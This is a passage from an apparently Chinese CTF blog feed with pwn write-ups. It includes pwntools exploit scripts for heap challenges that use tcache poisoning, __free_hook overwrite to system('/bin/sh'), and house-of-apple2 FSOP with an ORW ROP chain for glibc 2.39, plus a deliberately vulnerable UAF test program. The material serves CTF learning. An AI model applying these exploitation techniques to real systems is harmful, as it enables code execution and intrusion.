class="hljs-string">"libcbase"</span>)<br>free_hook=libcbase+libc.sym[<span class="hljs-string">'__free_hook'</span>]<br><span class="hljs-built_in">system</span>=libcbase+libc.sym[<span class="hljs-string">'system'</span>]<br><br><br><span class="hljs-keyword">delete</span>(<span class="hljs-number">3</span>)<br><span class="hljs-keyword">edit</span>(<span class="hljs-number">3</span>,<span class="hljs-keyword">b</span><span class="hljs-string">'A'</span>*<span class="hljs-number">0</span>x10)<br><span class="hljs-keyword">delete</span>(<span class="hljs-number">3</span>)<br><span class="hljs-keyword">edit</span>(<span class="hljs-number">3</span>,p64(free_hook)[:<span class="hljs-number">6</span>])<br><span class="hljs-built_in">add</span>(<span class="hljs-number">4</span>,<span class="hljs-number">0</span>x78,<span class="hljs-keyword">b</span><span class="hljs-string">'/bin/sh'</span>)<br><span class="hljs-built_in">add</span>(<span class="hljs-number">5</span>,<span class="hljs-number">0</span>x78,p64(<span class="hljs-built_in">system</span>)[:<span class="hljs-number">6</span>])<br><br><span class="hljs-keyword">delete</span>(<span class="hljs-number">4</span>)<br><br><span class="hljs-keyword">ia</span>()<br></code></pre></td></tr></table></figure><h1 id="chr"><a href="#chr" class="headerlink" title="chr"></a>chr</h1><h2 id="fix-2"><a href="#fix-2" class="headerlink" title="fix"></a>fix</h2><p>较常规的菜单题,就多了个convert的功能,其他几个功能都没有什么洞,那自然就看convert了</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202407272104795.png" alt="image-20240727210427717"></p><p>当时断网,还不清楚这里什么功能,但是也能猜到这下面的memcpy应该是能造成堆溢出,然后把n改成一个小一点的数字这里的check就过了</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202407272105915.png" alt="image-20240727210553864"></p><h2 id="break-2"><a href="#break-2" class="headerlink" title="break"></a>break</h2><p>这里在赛后查了一下是什么功能,就是一个中文的转换,然后会造成堆溢出</p><p>后面的攻击就比较常规了,改size覆盖其他堆块,然后泄露出libc改_IO_list_all为堆上的地址,最后打apple2的链子就行了</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-keyword">from</span> pwn import *<br><span class="hljs-keyword">from</span> ctypes import *<br><span class="hljs-keyword">from</span> struct import pack<br>banary = <span class="hljs-string">"./pwn"</span><br>elf = ELF(banary)<br><span class="hljs-comment">#libc = ELF("./libc.so.6")</span><br><span class="hljs-attribute">libc</span>=ELF("/lib/x86_64-linux-gnu/libc.so.6")<span class="hljs-built_in"></span><br><span class="hljs-built_in">ip </span>= <span class="hljs-string">''</span><span class="hljs-built_in"></span><br><span class="hljs-built_in">port </span>= 0<br>local = 1<br><span class="hljs-keyword">if</span> local:<br> io = process(banary)<br><span class="hljs-keyword">else</span>:<br> io = remote(ip, port)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br>def dbg():<br> gdb.attach(io)<br> pause()<br><br>s = lambda data : io.send(data)<br>sl = lambda data : io.sendline(data)<br>sa = lambda text, data : io.sendafter(text, data)<br>sla = lambda text, data : io.sendlineafter(text, data)<br>r = lambda : io.recv()<br>ru = lambda text : io.recvuntil(text)<br>uu32 = lambda : u32(io.recvuntil(b<span class="hljs-string">"\xff"</span>)[-4:].ljust(4, b<span class="hljs-string">'\x00'</span>))<br>uu64 = lambda : u64(io.recvuntil(b<span class="hljs-string">"\x7f"</span>)[-6:].ljust(8, b<span class="hljs-string">"\x00"</span>))<br>iuu32 = lambda : int(io.recv(10),16)<br>iuu64 = lambda : int(io.recv(6),16)<br>uheap = lambda : u64(io.recv(6).ljust(8,b<span class="hljs-string">'\x00'</span>))<br>lg = lambda data : io.success(<span class="hljs-string">'%s -> 0x%x'</span> % (data, eval(data)))<br>ia = lambda : io.interactive()<br><br>def cmd(choice):<br> ru(<span class="hljs-string">"choice >> "</span>)<br> sl(str(choice))<br><br>def <span class="hljs-built_in">add</span>(size,<span class="hljs-attribute">content</span>=b'youlin'):<br> cmd(1)<br> ru(<span class="hljs-string">"size:"</span>)<br> sl(str(size))<br> ru(<span class="hljs-string">"content:"</span>)<br> s(content)<br><br>def delete(index):<br> cmd(2)<br> ru(<span class="hljs-string">"idx:"</span>)<br> sl(str(index))<br><br>def <span class="hljs-built_in">edit</span>(index,content):<br> cmd(3)<br> ru(<span class="hljs-string">"idx:"</span>)<br> sl(str(index))<br> ru(<span class="hljs-string">"content:"</span>)<br> s(content)<br><br>def show(index):<br> cmd(4)<br> ru(<span class="hljs-string">"idx:"</span>)<br> sl(str(index))<br><br>def convert(index):<br> cmd(5)<br> ru(<span class="hljs-string">"idx:"</span>)<br> sl(str(index))<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(0x8):<br> <span class="hljs-built_in">add</span>(0x108)<br><span class="hljs-comment">#0-7</span><br><br><span class="hljs-built_in">edit</span>(0,b<span class="hljs-string">'A'</span><span class="hljs-number">*0</span>x100+<span class="hljs-string">'坤'</span>.encode(<span class="hljs-string">'UTF-8'</span>)+b<span class="hljs-string">'\x51\x05'</span>)<br>convert(0)<br><br>delete(1)<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(6):<br> <span class="hljs-built_in">add</span>(0x210)<br><span class="hljs-comment">#8-12</span><br><br>show(3)<br>ru(<span class="hljs-string">"content:"</span>)<br><span class="hljs-attribute">libcbase</span>=u64(io.recv(6).ljust(8,b'\x00'))-0x203b20<br>lg(<span class="hljs-string">"libcbase"</span>)<br>one=[0x50a47,0xebc81,0xebc85,0xebc88,0xebce2,0xebd3f,0xebd43]<br><span class="hljs-attribute">onegadget</span>=libcbase+one[1]<br><span class="hljs-attribute">l_next</span>=libcbase+0x3fe890<br><span class="hljs-attribute">rtld_global</span>=libcbase+0x3fd040<br><span class="hljs-attribute">system</span>=libcbase+libc.sym[<span class="hljs-string">'system'</span>]<br><span class="hljs-attribute">bin_sh</span>=libcbase+next(libc.search(b'/bin/sh\x00'))<br><span class="hljs-attribute">setcontext</span>=libcbase+libc.sym[<span class="hljs-string">'setcontext'</span>]+61<br>_IO_list_all = libcbase + 0x2044c0<br><span class="hljs-attribute">ret</span>=libcbase+0x000000000002882f<br><span class="hljs-attribute">pop_rdi</span>=libcbase+0x000000000010f75b<br><span class="hljs-attribute">leave_ret</span>=libcbase+0x00000000000299d2<br><span class="hljs-attribute">swapcontext</span>=libcbase+0x000000000005814D<br><span class="hljs-attribute">svcudp_reply</span>=libcbase+0x000000000017923D<br>one=[0x583dc,0x583e3,0xef4ce,0xef52b]<br><span class="hljs-attribute">one_gadget</span>=libcbase+one[3]<br><span class="hljs-attribute">open</span>=libcbase+libc.sym[<span class="hljs-string">'open'</span>]<br><span class="hljs-attribute">read</span>=libcbase+libc.sym[<span class="hljs-string">'read'</span>]<br><span class="hljs-attribute">write</span>=libcbase+libc.sym[<span class="hljs-string">'write'</span>]<br><span class="hljs-attribute">pop_rsi</span>=libcbase+0x0000000000110a4d<br><span class="hljs-attribute">syscall_ret</span>=libcbase+0x0000000000098fa6<br><span class="hljs-attribute">pop_rdx</span>=libcbase+0x00000000001a1034#pop rdx; <span class="hljs-built_in">add</span> rdi, rsi; xor eax, eax; cmp rdx, rsi; cmova rax, rdi; ret;<br><span class="hljs-attribute">pop_rax</span>=libcbase+0x00000000000dd237<br><br><span class="hljs-built_in">add</span>(0x108)#13<br><span class="hljs-built_in">add</span>(0x108)#14<br>delete(13)<br>delete(14)<br><br>show(3)<br>ru(<span class="hljs-string">"content:"</span>)<br><span class="hljs-attribute">key</span>=u64(io.recvuntil(b'\n')[:-1].ljust(8,b<span class="hljs-string">'\0'</span>))-1<br><span class="hljs-attribute">heapbase</span>=key<<12<br><span class="hljs-attribute">heapbase</span>=heapbase-0x6000<br>lg(<span class="hljs-string">"heapbase"</span>)<br><br><span class="hljs-built_in">edit</span>(4,p64(_IO_list_all^(key+1)))<br><span class="hljs-built_in">add</span>(0x108)#15<br><span class="hljs-built_in">add</span>(0x108,p64(heapbase+0x75e0-0x10))#16<br><br><span class="hljs-attribute">fake_heap</span>=heapbase+0x2a10<br><span class="hljs-attribute">heap1</span>=fake_heap+0x88<br>IO_wfile_jumps = libcbase + 0x202228#_IO_wfile_jumps<br><span class="hljs-built_in">add</span>(0x410)#17<br>lg(<span class="hljs-string">"fake_heap"</span>)<br>lg(<span class="hljs-string">"heap1"</span>)<br><br>fake_file = b<span class="hljs-string">''</span><br>fake_file = p64(0)+p64(1)<br>fake_file= fake_file.ljust(0x28,b<span class="hljs-string">'\x00'</span>)+p64(heap1)<br>fake_file = fake_file.ljust(0x68,b<span class="hljs-string">'\x00'</span>)+p64(fake_heap)<br>fake_file = fake_file.ljust(0x80,b<span class="hljs-string">'\x00'</span>)+p64(fake_heap)<br>fake_file = fake_file.ljust(0xb8,b<span class="hljs-string">'\x00'</span>)+p64(IO_wfile_jumps)<br>payload = cyclic(0x10)+fake_file<br><span class="hljs-built_in">edit</span>(0,payload)<br><br><span class="hljs-attribute">flag_addr</span>=heapbase+0x2d10<br><span class="hljs-attribute">orw</span>=p64(pop_rax)+p64(2)+p64(pop_rdi)+p64(flag_addr)+p64(pop_rsi)+p64(0)+p64(syscall_ret)<br>orw+=p64(pop_rdx)+p64(0x50)+p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(fake_heap+0x300)+p64(pop_rax)+p64(0)+p64(syscall_ret)<br>orw+=p64(pop_rdx)+p64(0x50)+p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(fake_heap+0x300)+p64(pop_rax)+p64(1)+p64(syscall_ret)<br><br>payload = b<span class="hljs-string">''</span><br>payload = payload.ljust(0x58,b<span class="hljs-string">'\x00'</span>)+p64(svcudp_reply)<br>payload = payload.ljust(0xa0,b<span class="hljs-string">'\x00'</span>)+p64(fake_heap+0x120-0x28)+p64(ret)<br>payload = payload.ljust(0xc0,b<span class="hljs-string">'\x00'</span>)+p64(fake_heap)+p64(0)<span class="hljs-number">*3</span>+p64(fake_heap-0x10)+p64(0)<br>payload +=b<span class="hljs-string">'\x00'</span><span class="hljs-number">*0</span>x28+p64(fake_heap)<br>payload +=p64(swapcontext)<br>payload = payload.ljust(0x128,b<span class="hljs-string">'\x00'</span>)+p64(fake_heap+0x130)+p64(ret)+orw<br>payload = payload.ljust(0x168,b<span class="hljs-string">'\x00'</span>)+p64(fake_heap)<br>payload = payload.ljust(0x300,b<span class="hljs-string">'\x00'</span>)+b<span class="hljs-string">'flag\x00'</span><br><span class="hljs-built_in">edit</span>(15,payload)<br><br><br>cmd(6)<br><br>ia()<br></code></pre></td></tr></table></figure>]]></content>
</entry>
<entry>
<title>基于house-of-apple2的GLIBC2.39利用</title>
<link href="/2024/05/30/house-of-apple2-GLIBC2-39/"/>
<url>/2024/05/30/house-of-apple2-GLIBC2-39/</url>
<content type="html"><![CDATA[<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>ubuntu更新到24了,感觉得看下glibc最新的利用,防止有师傅出2.39的题目</p><p>感谢REtard师傅在利用上给的两个关键建议</p><h1 id="利用条件"><a href="#利用条件" class="headerlink" title="利用条件"></a>利用条件</h1><p>泄露libc地址和堆地址</p><p>一次地址任意写(一般是largebin attack)</p><p>可以触发io流</p><h1 id="house-of-apple2利用链"><a href="#house-of-apple2利用链" class="headerlink" title="house of apple2利用链"></a>house of apple2利用链</h1><p>触发的方式和2.35并没有什么区别,直接调用exit或者从main函数返回退出,或是malloc_assert输出报错信息都行</p><p>exit触发的链</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk"><span class="hljs-keyword">exit</span>->fcloseall->_IO_cleanup->_IO_flush_all->_IO_wfile_overflow->_IO_wdoallocbuf<br></code></pre></td></tr></table></figure><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202405301628288.png" alt="image-20240530162844058"></p><p>利用方法就是劫持_IO_list_all为堆地址,从而伪造io结构体</p><p>前面的apple2的伪造感觉没什么说的,和2.35并没有什么太大差别,只需要调试一下看下几个check的点,稍微改一改就行了</p><h1 id="后续利用"><a href="#后续利用" class="headerlink" title="后续利用"></a>后续利用</h1><p>在2.35的apple2中,是可以直接控制rdx寄存器来打setcontext的,从而可以从容的写rop或者是orw,但是在2.39这里apple2的利用链并不能控制rdx寄存器,所以这里选择的是</p><figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">svcudp_reply</span><br><span class="hljs-attribute">swapcontext</span><br></code></pre></td></tr></table></figure><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202405301636385.png" alt="image-20240530163629351"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202405301635351.png" alt="image-20240530163512303"></p><p>先通过svcudp_reply控制r12寄存器,然后用swapcontext控制rsp,最后ret,就可以让程序执行我们的rop或者orw了</p><h1 id="例题"><a href="#例题" class="headerlink" title="例题"></a>例题</h1><p>源码:</p><figure class="highlight arduino"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br></pre></td><td class="code"><pre><code class="hljs arduino"><span class="hljs-comment">//gcc heap.c -o heap</span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdlib.h></span></span><br><br><span class="hljs-type">void</span> * ptr[<span class="hljs-number">0x10</span>] = {<span class="hljs-number">0</span>};<br><span class="hljs-type">int</span> ptr_size[<span class="hljs-number">0x10</span>] = {<span class="hljs-number">0</span>};<br><br><span class="hljs-function"><span class="hljs-type">void</span> <span class="hljs-title">init</span><span class="hljs-params">()</span></span>{<br> <span class="hljs-built_in">setbuf</span>(stdin, <span class="hljs-number">0</span>);<br> <span class="hljs-built_in">setbuf</span>(stdout, <span class="hljs-number">0</span>);<br> <span class="hljs-built_in">setbuf</span>(stderr, <span class="hljs-number">0</span>);<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">"LitCTF2024 heap 2.35"</span>);<br>}<br><br><span class="hljs-function"><span class="hljs-type">void</span> <span class="hljs-title">menu</span><span class="hljs-params">()</span></span>{<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">"1. create"</span>);<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">"2. delete"</span>);<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">"3. show"</span>);<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">"4. edit"</span>);<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">"5. exit"</span>);<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">">>"</span>);<br>}<br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">create</span><span class="hljs-params">()</span></span>{<br><span class="hljs-type">int</span> idx = <span class="hljs-number">0</span>, size = <span class="hljs-number">0</span>;<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">"idx? "</span>);<br><span class="hljs-built_in">scanf</span>(<span class="hljs-string">"%d"</span>, &idx);<br><span class="hljs-keyword">if</span>(idx < <span class="hljs-number">0</span> || idx >= <span class="hljs-number">0x10</span> || ptr[idx]){<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">"error !"</span>);<br><span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">"size? "</span>);<br><span class="hljs-built_in">scanf</span>(<span class="hljs-string">"%d"</span>, &size);<br><span class="hljs-keyword">if</span>(size<<span class="hljs-number">0x410</span> || size ><span class="hljs-number">0x1000</span>)<br>{<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">"error !"</span>);<br><span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br>ptr[idx] = <span class="hljs-built_in">malloc</span>(size);<br><span class="hljs-keyword">if</span>(!ptr[idx]){<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">"malloc error!"</span>);<br><span class="hljs-built_in">exit</span>(<span class="hljs-number">1</span>);<br>}<br>ptr_size[idx] = size;<br>}<br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">delete</span><span class="hljs-params">()</span></span>{<br><span class="hljs-type">int</span> idx = <span class="hljs-number">0</span>;<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">"idx? "</span>);<br><span class="hljs-built_in">scanf</span>(<span class="hljs-string">"%d"</span>, &idx);<br><br><span class="hljs-keyword">if</span>(idx < <span class="hljs-number">0</span> || idx >= <span class="hljs-number">0x10</span> || !ptr[idx]){<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">"no such chunk!"</span>);<br><span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br><span class="hljs-built_in">free</span>(ptr[idx]);<br>}<br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">show</span><span class="hljs-params">()</span></span>{<br><span class="hljs-type">int</span> idx = <span class="hljs-number">0</span>;<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">"idx? "</span>);<br><span class="hljs-built_in">scanf</span>(<span class="hljs-string">"%d"</span>, &idx);<br><br><span class="hljs-keyword">if</span>(idx < <span class="hljs-number">0</span> || idx >= <span class="hljs-number">0x10</span> || !ptr[idx]){<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">"no such chunk!"</span>);<br><span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">"content : %s\n"</span>, (<span class="hljs-type">char</span> *)ptr[idx]);<br>}<br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">edit</span><span class="hljs-params">()</span></span>{<br><span class="hljs-type">int</span> idx = <span class="hljs-number">0</span>;<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">"idx? "</span>);<br><span class="hljs-built_in">scanf</span>(<span class="hljs-string">"%d"</span>, &idx);<br><br><span class="hljs-keyword">if</span>(idx < <span class="hljs-number">0</span> || idx >= <span class="hljs-number">0x10</span> || !ptr[idx]){<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">"no such chunk!"</span>);<br><span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">"content : "</span>);<br><span class="hljs-built_in">read</span>(<span class="hljs-number">0</span>, (<span class="hljs-type">char</span> *)ptr[idx], ptr_size[idx]);<br>}<br><br><span class="hljs-function"><span class="hljs-type">void</span> <span class="hljs-title">Exit</span><span class="hljs-params">()</span></span>{<br><span class="hljs-keyword">for</span>(<span class="hljs-type">int</span> i = <span class="hljs-number">0</span>; i < <span class="hljs-number">0x10</span>; i++){<br><span class="hljs-keyword">if</span>(!ptr[i]){<br><span class="hljs-built_in">free</span>(ptr[i]);<br>ptr[i] = <span class="hljs-number">0</span>;<br>ptr_size[i] = <span class="hljs-number">0</span>;<br>}<br>}<br><span class="hljs-built_in">exit</span>(<span class="hljs-number">0</span>);<br>}<br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span></span>{<br> <span class="hljs-built_in">init</span>();<br><span class="hljs-type">int</span> idx = <span class="hljs-number">0</span>;<br><span class="hljs-keyword">while</span>(<span class="hljs-number">1</span>){<br><span class="hljs-built_in">menu</span>();<br><span class="hljs-built_in">scanf</span>(<span class="hljs-string">"%d"</span>, &idx);<br><span class="hljs-keyword">switch</span>(idx){<br><span class="hljs-keyword">case</span> <span class="hljs-number">1</span>:<br><span class="hljs-built_in">create</span>();<br><span class="hljs-keyword">break</span>;<br><span class="hljs-keyword">case</span> <span class="hljs-number">2</span>:<br><span class="hljs-built_in">delete</span>();<br><span class="hljs-keyword">break</span>;<br><span class="hljs-keyword">case</span> <span class="hljs-number">3</span>:<br><span class="hljs-built_in">show</span>();<br><span class="hljs-keyword">break</span>;<br><span class="hljs-keyword">case</span> <span class="hljs-number">4</span>:<br><span class="hljs-built_in">edit</span>();<br><span class="hljs-keyword">break</span>;<br><span class="hljs-keyword">case</span> <span class="hljs-number">5</span>:<br><span class="hljs-built_in">Exit</span>();<br><span class="hljs-keyword">break</span>;<br><span class="hljs-keyword">default</span>:<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">"error!"</span>);<br><span class="hljs-keyword">break</span>;<br>}<br>}<br><br><span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br></code></pre></td></tr></table></figure><p>题目就是一个简单的堆题,就一个uaf的漏洞,然后只能申请0x410-0x1000大小的堆块</p><p>可以只用一次largebin attack将_IO_list_all写入堆地址完成利用</p><p>exp:</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span 